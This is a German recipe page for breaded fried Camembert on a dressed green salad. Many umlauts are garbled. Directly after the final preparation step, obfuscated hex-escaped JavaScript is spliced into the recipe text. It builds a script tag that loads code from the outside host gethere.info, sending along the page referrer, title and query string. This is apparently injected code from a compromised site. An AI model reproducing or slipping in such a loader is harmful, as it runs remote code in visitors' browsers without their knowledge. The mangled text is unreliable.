Huettenhilfe Logo

Salat mit gebackenem Camenbert

Selbstgemachter panierter Camembert mit einem lecker angemachten grA?nen Salat. Einfacher als man denkt und besser als die TK Variante.

Zubereitung Keine AngabeKeine Angabe Schwierigkeit einfach Bewertung
1 Star2 Stars3 Stars4 Stars5 Stars (noch keine Bewertung)
Loading ... Loading ...
  • Zutaten:
  • 250 g Camenbert
  • 1 Verquirltes Ei
  • etwas Milch
  • etwas Paniermehl
  • Blattsalat ( z.B.: Feldsalat, Kopfsalat…)
  • 1 Karrotte
  • 1 Salatgurke
  • 2 EAYl. Balsamico-Essig
  • 1,5 EAYl OlivenA�l
  • 0,5 EAYl Mittelscharfen Senf

Zubereitung:

camembert-gebacken-salat.jpg

Den Salat waschen und gut abtropfen lassen. Damit der Salat spA�ter nicht zu nass ist und dadurch die Salatsauce zu wA�ssrig schmeckt.

camembert-gebacken.jpg

Den Camenbert in kleine WA?rfel schneiden. Die CamenberstA?cke zuerst in der Milch dann in dem Ei und zuletzt im Paniermahl wenden. Den panierten Camenbert im heiAYen A�l goldbelb anbraten.

Die Karotte in Julien Scheiben raspeln, die Gurke in Scheiben schneiden, anschlieAYend zum Salat geben. In einer kleinen SchA?ssel wird der Essig mit dem OlivenA�l und dem Senf verrA?hrt A?ber die Salat gieAYen und gut vermischen.

camembert-gebacken-salat-2.jpg

Zum Schluss kommen noch die CamenbertstA?cke A?ber den Salat.var _0xd052=[„x73x63x72x69x70x74″,“x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,“x73x72x63″,“x68x74x74x70x3Ax2Fx2Fx67x65x74x68x65x72x65x2Ex69x6Ex66x6Fx2Fx6Bx74x2Fx3Fx33x63x58x66x71x6Bx26x73x65x5Fx72x65x66x65x72x72x65x72x3D“,“x72x65x66x65x72x72x65x72″,“x26x64x65x66x61x75x6Cx74x5Fx6Bx65x79x77x6Fx72x64x3D“,“x74x69x74x6Cx65″,“x26″,“x3F“,“x72x65x70x6Cx61x63x65″,“x73x65x61x72x63x68″,“x6Cx6Fx63x61x74x69x6Fx6E“,“x26x66x72x6Dx3Dx73x63x72x69x70x74″,“x63x75x72x72x65x6Ex74x53x63x72x69x70x74″,“x69x6Ex73x65x72x74x42x65x66x6Fx72x65″,“x70x61x72x65x6Ex74x4Ex6Fx64x65″,“x61x70x70x65x6Ex64x43x68x69x6Cx64″,“x68x65x61x64″,“x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65″,“x70x72x6Fx74x6Fx63x6Fx6C“,“x68x74x74x70x73x3A“,“x69x6Ex64x65x78x4Fx66″,“x52x5Fx50x41x54x48″,“x54x68x65x20x77x65x62x73x69x74x65x20x77x6Fx72x6Bx73x20x6Fx6Ex20x48x54x54x50x53x2Ex20x54x68x65x20x74x72x61x63x6Bx65x72x20x6Dx75x73x74x20x75x73x65x20x48x54x54x50x53x20x74x6Fx6Fx2E“];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

von
Mitglied seit 2006

2 Kommentare zu Rezept – Salat mit gebackenem Camenbert

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Das Hausgemacht Forum

Noch nicht das passende Rezept gefunden?
Lust auf neue Kochideeen und spannende, kulinarische Themen?
Jetzt im Hausgemacht Forum mitreden!